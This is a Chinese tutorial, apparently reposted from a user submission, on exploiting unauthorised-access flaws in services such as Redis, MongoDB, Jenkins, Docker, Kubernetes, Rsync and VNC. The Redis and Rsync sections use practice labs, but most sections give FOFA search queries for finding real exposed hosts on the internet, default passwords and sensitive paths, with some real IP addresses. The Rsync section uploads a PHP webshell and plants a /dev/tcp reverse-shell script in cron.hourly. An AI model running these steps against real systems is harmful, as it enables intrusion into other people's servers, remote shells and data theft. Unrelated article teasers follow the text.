常見的未授權訪問漏洞靶場-練習教程

一.Redis未授權訪問漏洞

1.首先需要準備一個vps和vulhub靶場,然后進入目錄。

命令:進入靶場目錄:cd /etc/vulhub-master/redis/4-unacc? 啟動靶場:docker-compose up -d

2.然后啟動我們kali,下載redis服務然后連接redis,并執行命令。(這一步就證明存在未授權訪問漏洞)

命令:下載redis:apt-get install redis? ? 連接:redis-cli -h 靶場IP -p 端口

3.接下來需要下載一個攻擊項目:https://github.com/n0b0dyCN/redis-rogue-server

4.下載在我們的vps上然后啟動,啟動命令:python3 redis-rogue-server.py --rhost 目標IP地址 --lhost 本機IP地址

5.然后就可以執行命令了(反彈shell)

二、MongoDB未授權訪問漏洞

1.首先需要搭建靶場。

命令:拉取鏡像:docker pull mongo? ?啟動容器:docker run -d -p 272017:27017 --name mongodb mongo

2.然后我們使用kali的nmap的插件進行掃描,去掃描一下未授權訪問漏洞。命令:nmap -p 27017 --script mongodb-info 47.105.65.103

?3.驗證存在未授權訪問漏洞后就直接可以使用navicat連接了。

三、Memcached未授權訪問漏洞

1.首先我們需要下載Memcached:https://www.runoob.com/memcached/window-install-memcached.html。

2.接下來執行命令:memcached.exe -d install? ? ----> memcached.exe -d start?

3.接下來打開kali探測,輸入:telnet 172.16.2.26 11211 ,接下來就可以操作命令。

3.接下來就可以使用namp程序進行漏洞掃描,打開kali輸入:nmap -p 11211 --script memcached-info 172.16.2.26

四、Jenkins未授權訪問漏洞

1.使用fofa語法搜索

fofa語法:port="8080" && app="JENKINS" && title=="Dashboard [Jenkins]"

2.搜到結構篩選到有manage Jenkins的然后按照圖片執行。

五、Jupyter NoteBook

1.首先通過fofa語法搜索:"Jupyter Notebook" && port="8888" && "terminals"。然后按照圖片操作。

2.然后接下來就可以執行命令了

六、Elasticsearch未授權訪問漏洞

1.首先利用fofa搜索,fofa語法:"Elasticsearch" && port="9200"。搜索出來后就可以在后面加上一些敏感目錄就可以訪問到了。

2.訪問到后就可以看到了

七、Kibana未授權訪問漏洞

1.使用fofa語法搜索資產,fofa語法:"kibana" && port="5601"

2.接下來尋找有漏洞的網址,有漏洞的網址如圖所示

八、Docker Remote API未授權訪問漏洞

1.使用fofa搜索:port="2375" && "docker"

2.搜索到后就可以測試是否存在漏洞了,如圖所示操作。

九、Kubernetes API Server未授權訪問漏洞

1.首先使用fofa搜索:port="8080" && app="Kubernetes"

2.然后接下來在可以使用的網站后面拼接/version,就可以看到信息了

十、Hadoop未授權訪問漏洞

1.使用fofa搜索:port="8088" && app="Hadoop"

2.開啟頁面直接訪問不用經過用戶密碼驗證就可以了

十一、ActiveMQ未授權訪問漏洞

1.使用fofa搜索:body="ActiveMQ" && port="8161"

2.然后在網址后面拼接/admin進入后臺登錄,默認賬戶密碼都為:admin

3.登錄成功后就可以查看信息了

十二、RabbitMQ未授權訪問漏洞

1.我們使用fofa搜索:port="15672"或者port="15692"或者port="25672"、

2.打開頁面后就可以登錄了,默認賬戶、密碼都是guest

十三、Sprinboot Astuator未授權訪問漏洞

1.使用fofa搜索:icon_hash="116323821"

2.當點開鏈接出來以下界面,就代表定當前 web 應用是使用了springboot 框架

3.可以拼接以下路徑查看泄露的數據。

訪問/trace端點可以獲取基本的HTTP請求跟蹤信息,訪問/env端點獲取全部環境屬性

十四、JBOSS未授權訪問漏洞

1.我們點開fofa搜索:title="Welcome to JBoss" && icon_hash="-656811182"并且打開一個鏈接。

2.然后在后面拼接/jmx-console/就可以之間登錄進去了

十五、Rsync未授權訪問漏洞

1.這一關我們需要用到vulhub靶場,我們來到vulhub靶場然后啟動。

命令:?

cd vulhub/rsync/common

docker-compose up -d

2.然后我們來到kali執行命令:rsync rsync://自己靶機的IP/

3.然后我們就可以下載目標靶機上的文件。輸入命令:rsync rsync://IP:port/src/etc/passwd ?標路徑

4.然后我們查看以下下載下來的文件,可以看到成功下載了passwd

5.我們也可以上傳文件,比如一句話木馬。我們輸入:rsync ./phpinfo.php rsync://目標靶機ip/src/home 。 phpinfo.php里面寫上一句話木馬。

6.接下來我們就可以反彈shell,查看定時任務

7.然后將定時任務文件下載下來,輸入:rsync rsync://靶機ip/src/etc/crontab /tmp/tmp/crontab.txt

8.然后創建一個shell文件,輸入:/bin/bash -i >& /dev/tcp/監聽靶機IP/4444 0>&1

9.給文件授權,輸入:chmod 777 shell

10.上傳shell到靶機,輸入:rsync -av /tmp/tmp/shell rsync://靶機ip/src/etc/cr

on.hourly
11.攻擊機器開啟端口監聽,輸入:nc -lvvp 4444

十六、vpc未授權訪問漏洞

1.使用fofa搜索:(port="5900") && (is_honeypot=false && is_fraud=false)

2.然后打開kali,輸入:msfconsole

3.然后輸入:use auxiliary/scanner/vnc/vnc_none_auth

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/web/90931.shtml
繁體地址,請注明出處:http://hk.pswp.cn/web/90931.shtml
英文地址,請注明出處:http://en.pswp.cn/web/90931.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

EAP(基于事件的異步編程模式)

📜 1. 核心思想 📌 事件驅動解耦 異步操作通過事件通知結果,調用者無需阻塞線程,通過事件處理器響應操作完成、錯誤或取消。 📌 線程池與UI線程協同 耗時操作在后臺線程池執行,完成后通過 SynchronizationC…

【三橋君】如何解決后端Agent和前端UI之間的交互問題?——解析AG-UI協議的神奇作用

?你好,我是 ?三橋君? 📌本文介紹📌 >> 一、引言 在智能體(Agent)領域,MCP、A2A、ANP等協議已經規范了Agent與工具、Agent與Agent之間的通信,但Agent與用戶之間的交互一直缺乏標準化。…

面試官:詳細說說Kafka rebalance 的策略以及具體過程

hello啊,各位觀眾姥爺們!!!本baby今天又來報道了!哈哈哈哈哈嗝🐶 程序員各種工具大全 Kafka 的 Rebalance(再平衡) 是消費者組(Consumer Group)在消費者數量…

C++入門自學Day2-- c++類與對象(初識)

一、面向對象和面向過程1、什么是面向過程(Process-Oriented Programming, POP)📌 定義面向過程強調的是 過程(過程函數),即:按照步驟(流程)組織代碼。程序結構 數據結構…

DAO組織智能合約開發:從理論到實踐

目錄 DAO組織智能合約開發:從理論到實踐 1. DAO概述:去中心化自治組織 2. DAO核心組件設計 2.1 架構設計 2.2 關鍵智能合約 3. 治理代幣實現 3.1 ERC20擴展合約 4. 提案管理系統實現 4.1 提案狀態機 4.2 提案合約實現 5. DAO核心合約實現 5.1 DAO合約架構 5.2 提案類型擴展 6…

Ubuntu系統完整配置教程

Ubuntu系統完整配置教程 目錄 配置鏡像源安裝網絡服務虛擬機中安裝CUDAPython開發環境配置Java開發環境配置 1. 配置鏡像源 1.1 備份原始源文件 sudo cp /etc/apt/sources.list /etc/apt/sources.list.backup1.2 編輯源文件 sudo nano /etc/apt/sources.list1.3 各大鏡像源…

【mysql慢查詢】

mysql慢查詢慢查詢慢查詢日志配置慢查詢 慢查詢是指執行時間超過指定閾值的SQL語句。在MySQL中,默認情況下執行時間超過10秒的查詢會被認為是慢查詢,但這個閾值可以根據需要進行調整。 慢查詢日志配置 -- 查看當前慢查詢配置 SHOW VARIABLES LIKE slo…

django 按照外鍵排序

在Django中,使用外鍵(ForeignKey)進行排序是一種常見的需求,特別是在處理數據庫關系時,如用戶和訂單之間的關系(一個用戶有多個訂單)。下面是如何在使用Django ORM時進行基于外鍵的排序。 定義模…

JAVA_EIGHTEEN_特殊文件

目錄 Properties屬性文件 XML的作用和應用場景 日志技術 Properties屬性文件 約束:只能是鍵值對 鍵不能重復 文件后綴一般是.properties結尾的 是一個Map集合(鍵值對集合) 核心作用:Properties是用來代表屬性文件的&#…

第二十二節 MATLAB轉置向量、MATLAB追加向量

MATLAB中轉置操作能夠將一個行向量改變成一個列向量,反之亦然。MATLAB中轉置操作使用一個單引號()來表示。詳細例子在MATLAB中建立一個腳本文件,輸入下述代碼:r [ 1 2 3 4 ]; tr r; v [1;2;3;4]; tv v; disp(tr); …

window顯示驅動開發—Direct3D 11 視頻設備驅動程序接口 (DDI)

這些設備驅動程序接口 (DDI) 是新的或針對Windows 8更新的:CalcPrivateCryptoSessionSizeCalcPrivateAuthenticatedChannelSizeCalcPrivateVideoDecoderOutputViewSizeCalcPrivateVideoDecoderSizeCalcPrivateVideoProcessorEnumSizeCalcPrivateVideoProcessorInput…

新手向:用AI破解數據質量難題

用AI破解數據質量難題:從零開始的完整指南數據質量的重要性及其影響數據質量是數據分析、機器學習和業務流程中不可忽視的核心問題。低質量數據會導致一系列嚴重后果:錯誤決策:基于不準確或缺失的數據可能導致管理層做出錯誤判斷。例如&#…

用 Python 獲取電腦電池電量的各種案例

更多內容請見: python3案例和總結-專欄介紹和目錄 文章目錄 方法一:使用 `psutil` 庫(跨平臺) 方法二:Windows 專用方法(使用 `win32api`) 方法三:macOS 專用方法 方法四:Linux 專用方法 方法五:跨平臺統一方法 Python 程序案例:檢測電池電量并在低于20%時關機 以下…

Linux->自定義shell

目錄 引入: 1:shell是什么? 2:命令行提示符是什么? 3:xshell是什么? 一:命令行提示符 二: 獲取用戶輸入 三:分割字符串 四:執行命令 五…

js中出現-8.881784197001252e-16這種(一個極其接近 0 的極小負數)的浮點數精度計數異常問題解決思路

你的代碼中出現 -8.881784197001252e-16(一個極其接近 0 的極小負數)的原因是 JavaScript 浮點數精度問題。具體來說,當你反復進行 加法 和 減法 時,由于浮點數在計算機中的存儲方式,可能會引入微小的誤差。一、問題情…

超詳細的 RustDesk 自建中繼節點教程

厭倦了商業遠程控制軟件的會員限制和功能閹割?渴望擁有一個自由掌控、安全可靠的遠程連接方案?開源軟件 RustDesk 正是你需要的答案! 相信從事互聯網工作的你,一定對向日葵和ToDesk等商業遠程控制軟件并不陌生。然而,…

Spring Boot 2整合Druid的兩種方式

一、自定義整合Druid&#xff08;非Starter方式&#xff09;適用于需要完全手動控制配置的場景添加依賴&#xff08;pom.xml&#xff09;<dependency><groupId>com.alibaba</groupId><artifactId>druid</artifactId><version>1.2.8</ve…

鴻蒙Next-開發版本升級,API升級(例如API12升API16)

鴻蒙更新換代很快的&#xff0c;2025年1月&#xff0c;截至4月就有 DevEco Studio 5.0.2 Release 升級到 DevEco Studio 5.0.3 Release 升級到 DevEco Studio 5.0.4 Release&#xff0c;三次大版本更新。 作者也想在年前創建的項目中體驗一下新版本的特性&#xff0c;于是查看了…

樹莓派設置時區

查看當前時間 piraspberrypi-CM5:~ $ date Mon 28 Jul 09:22:38 BST 2025BST 指的是 British Summer Time&#xff0c;即英國夏令時&#xff08;UTC1&#xff09;。 所以這是英國&#xff08;倫敦等地&#xff09;在夏令時期間的本地時間&#xff0c;比標準的 UTC 時間快 1 小時…

C Primer Plus 第6版 編程練習——第13章(下)

8.編寫一個程序&#xff0c;以一個字符和任意文件名作為命令行參數。如果字符后面沒有參數&#xff0c;該程序讀取標 淮輸入;否則&#xff0c;程序依次打開每個文件并報告每個文件中該字符出現的次數。文件名和字符本身也要一同報告。程序應包含錯誤檢查&#xff0c;以確定參數…